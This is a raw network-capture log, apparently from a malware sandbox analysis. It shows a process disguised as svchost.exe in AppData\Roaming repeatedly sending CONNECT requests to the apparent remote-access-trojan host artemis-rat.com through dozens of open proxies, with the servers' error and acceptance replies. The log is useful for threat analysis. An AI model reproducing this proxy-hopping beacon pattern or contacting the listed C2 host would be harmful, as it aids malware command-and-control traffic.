Mar 9, 2024 13:14:29.045778036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.202455997 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2173	192.168.2.5	56781	43.155.130.182	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.045810938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2174	192.168.2.5	56905	92.204.135.37	16591	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.048680067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.645963907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.334120989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.833668947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.537020922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.333617926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2175	192.168.2.5	56999	203.32.120.202	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.052761078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.209197044 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2176	192.168.2.5	56758	115.74.157.191	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.052840948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2177	192.168.2.5	56702	61.133.66.69	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.052953959 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.427491903 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2178	192.168.2.5	56750	187.40.1.122	128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.058304071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.833342075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.196368933 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2179	192.168.2.5	56845	16.163.88.228	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.058495998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.371884108 CET	668	IN	HTTP/1.1 400 Bad Request Server: nginx/1.16.1 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 494 Connection: close ETag: "5d52d17f-1ee" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 65 72 72 6f 72 20 6c 6f 67 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe error log for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2180	192.168.2.5	56843	51.75.126.150	34144	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.058780909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2181	192.168.2.5	56847	91.189.177.189	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.065874100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.386068106 CET	1286	IN	HTTP/1.1 403 Forbidden Server: squid/5.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3628 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from lb1 X-Cache-Lookup: NONE from lb1:3128 Via: 1.1 lb1 (squid/5.7) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2182	192.168.2.5	56817	94.154.152.10	8079	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.065958977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.833349943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.834003925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.833872080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833707094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2183	192.168.2.5	56705	90.188.250.16	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.072467089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2184	192.168.2.5	57010	104.16.105.146	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.075315952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.231844902 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2185	192.168.2.5	56832	45.11.95.166	6010	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.075781107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2186	192.168.2.5	56833	103.213.97.74	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.077749968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.408797979 CET	334	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 204 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2187	192.168.2.5	56816	128.199.202.122	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.078583956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.447529078 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2188	192.168.2.5	56951	13.59.156.167	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.079866886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.296804905 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:29 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2189	192.168.2.5	56609	185.81.153.162	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.085099936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2190	192.168.2.5	56866	88.99.138.21	6969	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.086291075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2191	192.168.2.5	56863	110.12.211.140	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.088648081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2192	192.168.2.5	56708	124.160.118.183	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:29.091950893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
